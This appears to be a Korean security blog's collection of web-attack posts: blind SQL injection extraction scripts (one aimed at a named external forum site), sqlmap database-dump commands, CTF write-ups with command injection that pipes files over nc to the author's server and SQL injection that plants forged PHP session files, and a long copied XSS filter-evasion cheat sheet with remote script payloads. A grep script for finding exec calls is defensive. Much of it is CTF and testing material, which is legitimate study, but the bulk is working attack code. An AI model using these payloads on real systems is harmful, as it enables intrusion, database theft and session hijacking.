2015. 10. 24. 16:20

#!/usr/bin/python


import urllib2,urllib,time

# select database()

#query = "1 and (substr((lpad(bin(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))),7,0)),1,1)=1)"

#5F5F5F5F5F5F5F5F5F5F5F5F313339313533363335

target = "select group_concat(keystr) from KeyDB.kt1509 where signature like 0x3234306136346465633530615F5F5F5F5F5F5F5F"

x = 0

answer = ""


while 1:

x +=1

ch = 0


for i in range(1,8):

url = "http://poworks.com/index.php/forum/?cid=0&show="

#att = "1 and ascii(substr((%s),%d,1))=%d"%(target,x,i)

att = "1 and (substr((select lpad( bin( ascii(substr((%s),%d,1)) ),7,0)) ,%d,1)=1)#"%(target,x,i)

att = urllib.quote(att)

url += att

req = urllib2.Request(url)

result = urllib2.urlopen(req).read()

#print result

r = result.find("No replies posted yet.")

if r > -1:

ch += 2**(7-i)

else:

pass


if ch == 0:


break


else:


answer += chr(ch)


print ":) : "+ answer



print "END : ",answer



Posted by k1rha
2015. 3. 3. 20:32

==================

SQLMAP sql injectionor 

download :  https://github.com/sqlmapproject/sqlmap

usage  : https://github.com/sqlmapproject/sqlmap/wiki/Usage


==================


GET/POST, 헤더정보 포함 텍스트 파일 생성

   (예, sample.txt)


sqlmap.py -r sample.txt --dbs --timeout 5

   -r : 생성한 텍스트파일 지정

   --dbs : 데이터베이스 검색

   --timeout : 응답 기다리는 시간 5



데이터베이스 덤프

    -D DB               DBMS database to enumerate

    -T TBL              DBMS database table to enumerate

    -C COL              DBMS database table column to enumerate

    --dump              Dump DBMS database table entries

  실행예> sqlmap.py -r a.txt --timeout 5 -D mf.webgm.co.kr -T g4_member --dump


./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" --dbs   //dbs가져오기 

./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" -D "board" --tables // tables 가져오기 

./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" -D "board" -T "member" --columns //columns 가져오기

./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" -D "board" -T "member" -C "bId","bPass" --dump  // 값들가져오기 



 



Posted by k1rha
2014. 11. 8. 21:45
http://webcache.googleusercontent.com/search?q=cache:nkjOOvPZjPcJ:securitysucks.info/exploit-phps-mail-to-get-remote-code-execution/+&cd=1&hl=en&ct=clnk&gl=us



With that said, let’s just dive into it!

This is the code for exploiting the mail() function

Let’s inspect the logs from this. First let’s have a look at what we can see in the browser by only going to the rce.php file

Nothing really scary to see in this log. Now, let’s use the catcommand in the terminal on the same file

See anything a bit more interesting? Let’s try to execute some commands.

I visit http://localhost/rce.php?cmd=ls%20-la and get the following output

Now, let me break it down in case you don’t fully understand the code

Posted by k1rha
2013. 10. 5. 13:16

웹에서 exec 계열소스를 사용하였는지, 내용검색 기반으로 검색하는 쉘스크립트를 작성해보았다.

조금만 응용하면 Code 단에서 Injection 먹히는 부분을 빠르게 점검할 수 있다.



#vi findExecve.sh     (쉘스크립트 삭성을 하여 일괄 처리)

 

#!/bin/bash

echo "START"

grep -r -n "system(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' > result.txt

grep -r -n "execl(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

grep -r -n "execve(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

grep -r -n "fopen(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

grep -r -n "passthru(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

grep -r -n "exec" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

grep -r -n "shell_exec(" ./ | awk -F : '{print "filename : "$1"\nline: "$2"\nmatch: "$3"\n\n"}' >> result.txt

echo "create file \"result.txt\""

echo "FINISH" 




Posted by k1rha
2013. 9. 15. 21:28


[white hacking] 화이트 해킹대회 MMMMYYYYYYYYY PPPPAAAASSSWWWOOORRRDDD!!!!!!(150 points)



Solved by 광운


Node.js 코드가 주어지고 사이트에 접근 할 수 있는 주소가 주어진다.

주소로 들어가보면 간단하게 회원가입을 할 수 있고 패스워드를 찾을 수 있는 페이지 가 존재한다.


패스워드를 찾아주는 곳에 아이디를 넣고 전송을 누르면 [인증 코드]가 메일로 오는 것을 확인 할 수 있었다. 





주어진 Node.js 소스코드를 보니 E-mail이 오는 부분을 확인 할 수 있었는데, mail 이라는 명령어를 exec()를 사용하여 이메일을 보내는 것을 확인 할 수 있었고, 이를 보면 email 안에 특정 명령어를 같이 실행 시켜서 값을 찾아내야 했다.





메일에 어떠한 문자열들이 허가 되는지 부터 살펴보면 아래코드와 같다. 


아래 문자열과 더불어 띄어쓰기도 되지 않았다.


function validateEmail(email) {

        return /^(?:[\w\!\#\ \$\%\&\'\*\+\-\/\=\?\^\`\{\|\}\~]+\.)*[\w\!\#\$\%\&\'\*\+\-\/\=\?\^\`\{\|\}\~]+@(?:(?:(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-](?!\.)){0,61}[a-zA-Z0-9]?\.)+[a-zA-Z0-9](?:[a-zA-Z0-9\-](?!$)){0,61}[a-zA-Z0-9]?)|(?:\[(?:(?:[01]?\d{1,2}|2[0-4]\d|25[0-5])\.){3}(?:[01]?\d{1,2}|2[0-4]\d|25[0-5])\]))$/.test(email);

}


대충 사용 할 수 있는 문자열은 아래와 같다.


|,  a-z , 0-9 , $ , & , . , { , } '  정도였다.   


띄어쓰기 문제가 가장 컸는데, 환경변수에 띄어쓰기가 있는 것을 찾았다.


IFS 환경변수 


IFS 변수는 도스에서는 사용하지 않는 변수이다. 이것은 

사용자의 명령행중 공백 구분자를 표시하는 것으로 디폴 

트 값은 ' ' 이다. 즉, IFS 환경변수가 디폴트로 설정되 

어 있는 경우, 다음과 같은 형태로 명령을 내리는 것이 

가능하다. 



[myserver]

 #nc -lvp 8888 


[회원가입->패스워드 찾기] 

  &&ls'|nc$IFS'k1rha.com'$IFS'8888'&&@gmail.com   //어떠한 파일들이 있는지 검사 


  &&cat$IFS'main.js'|nc$IFS'k1rha.com'$IFS'8888'&&@gmail.com   //main.js를 내서버로 보냄 



[main.js 파일안에 flag가 있다 ] 


if (users[email] == pass) {

if (email == 'admin@beollejavi.kr')

res.end(JSON.stringify({'code': 0, 'id': email, 'msg': 'Contgrats! flag: WHC793b5f3b55d99590fc1a7ebc1654f66b'}));


key file : WHC793b5f3b55d99590fc1a7ebc1654f66b








Posted by k1rha
2013. 9. 15. 20:06

[White Hacking] Serial2 web(150 point) Write-up , 화이트 해킹대회


Solved By 광운(exso)



1. 우선 로그인을 해보면 비밀글을 읽고 싶게 만들어져 있으므로 readme 권한을 얻어냈다.




2. 우선 페이지의 Admin 페이지를 가보면 가벼운 인젝션이 먹히는 것을 확인 할 수있다. 

하지만 얻어낼 것은 아무것도 없었다. 데이터베이스는 다른 데이터베이스와 나눠져 있었다.


union select 가 먹히는 것도 확인 했다.


loadfile 과 outfile 이 먹혀 들어가는 것도 확인 했다. 


아래는 loadfile 로 결과를 union select 로 확인한 화면이다. 


union select ..... into outfile('[파일명]');  을 이용하여 세션을 강제 주입하여 readme 권한으로 세션을 만들어야 한다. 세션을 /var/lib/php5/ 에 강제 주입시키고, 그 세션으로 하이제킹하여 readme 권한을 얻는 방법을 써야 한다. 


세션을 만들기 위해 세션이 어떤식으로 생성되는가를 봐야하는데, 이는 include 취약점을 만들어두어

소스코드를 읽을 수 있게 해 두었다. 


session 이름은 memdata 이고 id,pw,level,을 인자로서 만들어 진다는 것을 알 수 있었다.

서버에 똑같이 코딩하여 세션을 생성 하였다.



[세션을 만들어내는 모습]


[인젝션을 할 시 싱글 쿼터 더블쿼터가 걸리적 거리므로 헥사코드로 전부 치환 시킨다]




인젝션 구문을 통하여 서버에 강제로 readme 계정의 세션을 주입 시킨다.

'union select 0x6D656D646174617C733A38363A22613A343A7B733A333A22696478223B733A313A2231223B733A323A226964223B733A363A22726561646D65223B733A323A227077223B733A343A2261616161223B733A353A226C6576656C223B733A313A2231223B7D223B into outfile '/var/lib/php5/sess_k1rha' #


(여기서 세션 이름은 sess_ 가 반드시 포함되어야 하며 k1rha는 임의의 세션명이다.)


[세션 강제 주입 화면 .강제 주입시는 sess_ 를 빼고 삽입한다]



[세션을 대체하고나면 비밀글이 보인다. 

하지만 답이 있는것이 아니라 디비를 다시 뒤지라고 알려준다.]




이렇게 세션이 삽입 된다는 것을 알았다.


이때 session id 대신 session level 을 출력해 주는 방식을 사용하여 level 부분에 다시 유니온을 사용하여

member테이블에 대한 값을 구해 올 수 있었다.



' union select 'memdata|s:161:"a:4:{s:3:"idx";s:1:"1";s:2:"id";s:5:"k2rha";s:2:"pw";s:8:"anything";s:5:"level";s:72:"2\' union select group_concat(table_name) from information_schema.tables#";}";' into outfile '/var/lib/php5/sess_customsession1'#


CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLESPACES,TABLE_C : Hacking Detected

.

.

.

.

이하 생략

.

.

.




union select 'memdata|s:136:"a:4:{s:3:"idx";s:1:"1";s:2:"id";s:5:"k1rha";s:2:"pw";s:8:"anything";s:5:"level";s:47:"2\' union select k3yk3y from k3y_1s_h3r3.k3yk3y#";}";' into outfile '/var/lib/php5/sess_customsession'#














Posted by k1rha
2013. 6. 10. 15:29

#python

from socket import *

import sys

import struct



IP = "127.0.0.1"

PORT = 80

STD_STR = "1 a"


def MakePacket(UNIT,NUM,RAW=0):


HEADER = "GET /mysql_test.php?id=1%26%26hex(mid((select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a1,1),"+str(UNIT)+",1))="

FOOTER = " HTTP/1.0\r\n\r\n"

SEND_PACKET =  HEADER + str(NUM) + FOOTER

return SEND_PACKET


def SendPacket(UNIT, NUM):

sock  = socket(AF_INET,SOCK_STREAM)

sock.connect((IP,PORT))

_sendData = MakePacket(UNIT,NUM)

sock.send(_sendData)

data=sock.recv(10240)

return data 


def main():

RESULT=''

for i in range (1,20):

for j in range (30,128):

RES = SendPacket(i,j)

if RES.find(STD_STR) > 0 :

RESULT = RESULT + str(j)

print RESULT.decode("hex")



if __name__== "__main__" :

main()



Posted by k1rha
2013. 1. 23. 11:25

[출처 : http://ha.ckers.org/ ]

크로스 사이트 스크립트 치트시트 (XSS Cheat sheet)


XSS Filter Evasion Cheat Sheet

From OWASP
Jump to: navigation, search

Contents

[hide]

Introduction

This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing.

Tests

This cheat sheet is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion.

Please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the scripts.

XSS Locator

Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

XSS locator 2

If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS verses &lt;XSS to see if it is vulnerable:

'';!--"<XSS>=&{()}

No Filter Evasion

This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Image XSS using the JavaScript directive

Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well:

<IMG SRC="javascript:alert('XSS');">

No quotes and no semicolon

<IMG SRC=javascript:alert('XSS')>

Case insensitive XSS attack vector

<IMG SRC=JaVaScRiPt:alert('XSS')>

HTML entities

The semicolons are required for this to work:

<IMG SRC=javascript:alert("XSS")>

Grave accent obfuscation

If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents:

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

Malformed A tags

Skip the HREF attribute and get to the meat of the XXS... Submitted by David Cross ~ Verified on Chrome

<a onmouseover="alert(document.cookie)">xxs link</a>

or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

<a onmouseover=alert(document.cookie)>xxs link</a>

Malformed IMG tags

Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

fromCharCode

if no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Default SRC tag to get past filters that check SRC domain

This will bypass most SRC domain filters. Inserting javascript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur, onclick giving you an extensive amount of variations for many injections listed here. Submitted by David Cross.

<IMG SRC=# onmouseover="alert('xxs')">

Default SRC tag by leaving it empty

<IMG SRC= onmouseover="alert('xxs')">

Default SRC tag by leaving it out entirely

<IMG onmouseover="alert('xxs')">

UTF-8 Unicode encoding

all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). Use the XSS Calculator for more information:

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>

Long UTF-8 Unicode encoding without semicolons

This is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total. This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I've seen this in the wild):

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

Hex encoding without semicolons

This is also a viable XSS attack against the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters). Use the XSS calculator for more information:

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

Embedded tab

Used to break up the cross site scripting attack:

<IMG SRC="jav	ascript:alert('XSS');">

Embedded Encoded tab

Use this one to break up XSS :

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Embedded newline to break up XSS

Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

Embedded carriage return to break up XSS

(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

Null breaks up JavaScript directive

Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hypen control char). But the null char %00is much more useful and helped me bypass certain real world filters with a variation on this example:

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

Spaces and meta chars before the JavaScript in images for XSS

This is useful if the pattern match doesn't take into account spaces in the word "javascript:" -which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal:

<IMG SRC=" &#14;  javascript:alert('XSS');">

Non-alpha-non-digit XSS

The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefor considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s":

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Based on the same idea as above, however,expanded on it, using Rnake fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Extraneous open brackets

Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error:

<<SCRIPT>alert("XSS");//<</SCRIPT>

No closing script tags

In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't effect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:

<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

Protocol resolution in script tags

This particular variant was submitted by Łukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.

<SCRIPT SRC=//ha.ckers.org/.j>

Half open HTML/JavaScript XSS vector

Unlike Firefox the IE rendering engine doesn't add extra data to your page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close ">" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ because it doesn't require the end ">". As a side note, this was also affective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag:

<IMG SRC="javascript:alert('XSS')"

Double open angle brackets

Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:

<iframe src=http://ha.ckers.org/scriptlet.html <

Escaping JavaScript escapes

When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a="\\";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.:

\";alert('XSS');//

End title tag

This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross site scripting attack:

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

INPUT image

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

IMG Dynsrc

<IMG DYNSRC="javascript:alert('XSS')">

IMG lowsrc

<IMG LOWSRC="javascript:alert('XSS')">

List-style-image

Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

VBscript in an image

<IMG SRC='vbscript:msgbox("XSS")'>

Livescript (older versions of Netscape only)

<IMG SRC="livescript:[code]">

BODY tag

Method doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign ("onload=" != "onload ="):

<BODY ONLOAD=alert('XSS')>

Event Handlers

It can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates:

 1.	FSCommand() (attacker can use this when executed from within an embedded Flash object)
 2.	onAbort() (when user aborts the loading of an image)
 3.	onActivate() (when object is set as the active element)
 4.	onAfterPrint() (activates after user prints or previews print job)
 5.	onAfterUpdate() (activates on data object after updating data in the source object)
 6.	onBeforeActivate() (fires before the object is set as the active element)
 7.	onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand  ("Copy") function)
 8.	onBeforeCut() (attacker executes the attack string right before a selection is cut)
 9.	onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
 10.	onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
 11.	onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
 12.	onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function).
 13.	onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
 14.	onBegin() (the onbegin event fires immediately when the element's timeline begins)
 15.	onBlur() (in the case where another popup is loaded and window looses focus)
 16.	onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)
 17.	onCellChange() (fires when data changes in the data provider)
 18.	onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)
 19.	onClick() (someone clicks on a form)
 20.	onContextMenu() (user would need to right click on attack area)
 21.	onControlSelect() (fires when the user is about to make a control selection of the object)
 22.	onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command)
 23.	onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command)
 24.	onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
 25.	onDataSetChanged() (fires when the data set exposed by a data source object changes)
 26.	onDataSetComplete() (fires to indicate that all data is available from the data source object)
 27.	onDblClick() (user double-clicks a form element or a link)
 28.	onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
 29.	onDrag() (requires that the user drags an object)
 30.	onDragEnd() (requires that the user drags an object)
 31.	onDragLeave() (requires that the user drags an object off a valid location)
 32.	onDragEnter() (requires that the user drags an object into a valid location)
 33.	onDragOver() (requires that the user drags an object into a valid location)
 34.	onDragDrop() (user drops an object (e.g. file) onto the browser window)
 35.	onDrop() (user drops an object (e.g. file) onto the browser window)
 36.	onEnd() (the onEnd event fires when the timeline ends.    
 37.	onError() (loading of a document or image causes an error)
 38.	onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
 39.	onFilterChange() (fires when a visual filter completes state change)
 40.	onFinish() (attacker can create the exploit when marquee is finished looping)
 41.	onFocus() (attacker executes the attack string when the window gets focus)
 42.	onFocusIn() (attacker executes the attack string when window gets focus)
 43.	onFocusOut() (attacker executes the attack string when window looses focus)
 44.	onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
 45.	onKeyDown() (user depresses a key)
 46.	onKeyPress() (user presses or holds down a key)
 47.	onKeyUp() (user releases a key)
 48.	onLayoutComplete() (user would have to print or print preview)
 49.	onLoad() (attacker executes the attack string after the window loads)
 50.	onLoseCapture() (can be exploited by the releaseCapture() method)
 51.	onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
 52.	onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
 53.	onMouseDown() (the attacker would need to get the user to click on an image)
 54.	onMouseEnter() (cursor moves over an object or area)
 55.	onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
 56.	onMouseMove() (the attacker would need to get the user to mouse over an image or table)
 57.	onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
 58.	onMouseOver() (cursor moves over an object or area)
 59.	onMouseUp() (the attacker would need to get the user to click on an image)
 60.	onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
 61.	onMove() (user or attacker would move the page)
 62.	onMoveEnd() (user or attacker would move the page)
 63.	onMoveStart() (user or attacker would move the page)
 64.	onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
 65.	onPaste() (user would need to paste or attacker could use the execCommand("Paste") function)
 66.	onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)
 67.	onProgress() (attacker would use this as a flash movie was loading)
 68.	onPropertyChange() (user or attacker would need to change an element property)
 69.	onReadyStateChange() (user or attacker would need to change an element property)
 70.	onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
 71.	onReset() (user or attacker resets a form)
 72.	onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
 73.	onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
 74.	onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
 75.	onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
 76.	onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
 77.	onRowsEnter() (user or attacker would need to change a row in a data source)
 78.	onRowExit() (user or attacker would need to change a row in a data source)
 79.	onRowDelete() (user or attacker would need to delete a row in a data source)
 80.	onRowInserted() (user or attacker would need to insert a row in a data source)
 81.	onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
 82.	onSeek() (the onreverse event fires when the timeline is set to play in any direction other than forward)
 83.	onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
 84.	onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
 85.	onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
 86.	onStart() (fires at the beginning of each marquee loop)
 87.	onStop() (user would need to press the stop button or leave the webpage)
 88.	onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
 89.	onSubmit() (requires attacker or user submits a form)
 90.	onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)
 91.	onTrackChange() (user or attacker changes track in a playList)
 92.	onUnload() (as the user clicks any link or presses the back button or attacker forces a click)
 93.	onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
 94.	seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point.   The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)

BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

& JavaScript includes

<BR SIZE="&{alert('XSS')}">

STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

Remote style sheet

(using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

Remote style sheet part 2

This works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

Remote style sheet part 3

This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

Remote style sheet part 4

This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites:

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

STYLE tags with broken up JavaScript for XSS

This XSS at times sends IE into an infinite loop of alerts:

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

STYLE attribute using a comment to break up expression

